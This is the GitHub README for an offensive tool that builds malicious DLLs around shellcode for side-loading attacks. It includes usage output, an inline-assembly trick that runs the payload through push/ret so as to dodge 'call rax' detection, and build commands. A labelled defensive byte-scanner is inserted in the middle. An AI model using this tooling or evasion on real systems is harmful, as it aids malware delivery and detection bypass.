GitHub - Mr-Un1k0d3r/MaliciousDLLGenerator: DLL Generator for side loading attac...
source link: https://github.com/Mr-Un1k0d3r/MaliciousDLLGenerator
MaliciousDLLGenerator
DLL Generator for side loading attack
Currently only supports 64-bit shellcode
Usage
$ python gen-dll.py -h
MaliciousDLLGenerator - Mr.Un1k0d3r - RingZer0 Team
---------------------------------------------------
[-] Shellcode size is limited to 1024 bytes
usage: gen-dll.py [-h] -o OUTPUT -s SHELLCODE [-t TYPE]

optional arguments:
  -h, --help            show this help message and exit
  -o OUTPUT, --output OUTPUT
                        Output filename
  -s SHELLCODE, --shellcode SHELLCODE
                        Raw shellcode file path
  -t TYPE, --type TYPE  DLL type (default,oart)
Shellcode gadget
Instead of using the standard shellcode calling structure:
char shellcode[] = {};
int(*execute)(void);
execute = (int(*)())shellcode;
execute();
Which results in the following assembly code:
call rax
The DLL mimics a standard function return by using the following code:
CHAR payload[] = "";
asm volatile ("mov %%rax, %0\n\t"
"push %%rax\n\t"
"ret"
:
: "r" (payload));
Which results in the following assembly code:
mov rax, rsp
push rax
ret
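
For defenders, the contrast above means a rule keyed only on `call rax` will not match the `push rax` / `ret` form. The following is an added example, not code from the MaliciousDLLGenerator project: a byte-pattern triage scan that flags both forms, generalized from `rax` to every 64-bit register. The function name and the sample bytes are constructed for illustration.

```python
# Added example: byte-pattern triage for register-indirect control transfers.
# Linear scan with no disassembly, so hits are leads to review, not proof:
# the same bytes can also occur inside operands or data.

REG64 = ["rax", "rcx", "rdx", "rbx", "rsp", "rbp", "rsi", "rdi",
         "r8", "r9", "r10", "r11", "r12", "r13", "r14", "r15"]


def find_indirect_transfers(code: bytes, base: int = 0):
    """Return [(address, mnemonic)] for `call reg` and `push reg; ret` patterns."""
    hits = []
    for i in range(len(code) - 1):
        b0, b1 = code[i], code[i + 1]
        # A 0x41 byte (REX.B) directly before the opcode selects r8..r15.
        rex_b = i > 0 and code[i - 1] == 0x41
        start = i - 1 if rex_b else i
        hi = 8 if rex_b else 0
        if b0 == 0xFF and 0xD0 <= b1 <= 0xD7:
            # FF /2 with a register operand: call r64
            hits.append((base + start, f"call {REG64[b1 - 0xD0 + hi]}"))
        elif 0x50 <= b0 <= 0x57 and b1 == 0xC3:
            # 50+r followed by C3: push r64 ; ret
            hits.append((base + start, f"push {REG64[b0 - 0x50 + hi]}; ret"))
    return hits


# Constructed sample bytes (not extracted from any real DLL):
#   90 90        nop; nop
#   ff d0        call rax
#   90           nop
#   48 89 e0     mov rax, rsp   (as in the listing above)
#   50 c3        push rax; ret
#   41 53 c3     push r11; ret
SAMPLE = bytes.fromhex("9090" "ffd0" "90" "4889e0" "50c3" "4153c3")

if __name__ == "__main__":
    for addr, what in find_indirect_transfers(SAMPLE, base=0x1000):
        print(f"{addr:#x}: {what}")
```

In practice the scan would be run over the executable sections of a DLL, and each hit confirmed with a disassembler before it is treated as a finding.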
Compiling from source using GCC
C:\> x86_64-w64-mingw32-g++.exe -Wall -DBUILD_DLL -O2 -c maindll.cpp -o maindll.o
C:\> x86_64-w64-mingw32-g++.exe -shared -Wl,--dll maindll.o -o yourdll.dll -s
Credit
Mr.Un1k0d3r RingZer0 Team